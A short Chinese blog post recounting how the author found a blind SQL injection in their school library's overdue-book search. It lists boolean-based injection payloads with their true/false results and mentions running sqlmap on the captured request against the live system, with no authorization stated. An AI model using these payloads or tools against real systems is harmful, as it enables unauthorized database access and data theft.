对学校图书馆系统的一次sql注入的挖掘

zhaorong · 发表于 WEB前端技术 2020-11-20 15:28:03


	前言：按理来说首先肯定是信息收集啥的不过这个系统是我们学校内网系统，所以只是测试了功能点话不多说，直接开冲借书超期查询出存在sql注入漏洞。首先看看页面可以看到有一个搜索框输个1测试下再加个单引号测试一下初步判断有无注入好家伙等了半分钟都没变化我还以为你没传完数据呢这时，我开始怀疑是不是有搜索框注入话不多说，直接burp重放测试看到为POST提交 TextBox3参数为我们搜索框输入的内容，且输入1时会有以下响应可惜的是我发现输入1'也会是这个响应经过很长时间的测试以及构造payload，我发现了奇点我换了一种思路假设输入1和1'返回200是数据库正确处理数据那也就是说，输入1'不弹窗只是单纯的不弹窗和报错没关系然后我经过了一段时间的探索，发现用or可以成功让他真正意义的报错如图：看一下浏览器，显示的是这样构造的payload如下 -1' or 2+318-318-1=0+0+0+1 --+ -->ture -1' or 3+318-318-1=0+0+0+1 --+ -->false -1' or 32<(0+5+318-318) --+ -->false -1' or 32>(0+5+318-318) --+ -->false -1' or 2+1-1-1=1 and 000318=000318 --+ -->ture -1' or 000318=000318 and 3+1-1-1=1 --+ -->false -1' or 32=5 and 000318=000318 --+ -->false -1' or 32=6 and 000318=000318 --+ -->ture -1' or 320=6 and 000318=000318 --+ -->false -1' or 321=6 and 000318=000318 --+ -->ture 于是乎成功判断该处有sql注入漏洞把burp的POST数据包复制粘贴到1.txt，直接上sqlmap跑因为是自己学校的网站而且sqlmap跑的速度太慢光跑数据库就跑了半个小时所以就不继续深挖了。

微信扫一扫 分享朋友圈

对学校图书馆系统的一次sql注入的挖掘

微信扫一扫分享朋友圈